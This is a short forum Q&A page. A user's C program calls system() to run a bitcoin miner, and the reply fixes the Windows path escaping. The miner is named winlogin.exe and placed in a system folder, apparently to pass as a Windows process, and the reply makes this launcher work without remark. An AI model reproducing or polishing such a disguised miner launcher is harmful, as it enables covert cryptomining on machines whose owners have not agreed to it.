18881/problems-using-system-commands-under-windows
i'm trying to run a bitcoin miner trough a system command. Here is the code
#include <windows.h> int main() { system("C:\Windows\AppPatch\Custom\Personal\winlogin.exe -o http://example.pool.com:80 -u user -p password"); }
Please help
You need to have double \ for paths
system("C:\\Windows\\AppPatch\\Custom\\Personal\\winlogin.exe -o http://example.pool.com:80 -u user -p password");
or single '/'
Hey, you can take the help of ...READ MORE
The Fabric Node SDK actually provides a ...READ MORE
Consider following tutorial from Hyperledger Fabric "Getting Started" pages. Basically ...READ MORE
What is the argument utxos int the ...READ MORE
yes all are over TCP/IP connections secured by TLS encryption in hashgraph architecture-hashgraph, ...READ MORE
This was a bug. They've fixed it. ...READ MORE
Summary: Both should provide similar reliability of ...READ MORE
First create your custom token. Then develop ...READ MORE
Do not interact directly with the ledger.. ...READ MORE
OR
Already have an account? Sign in.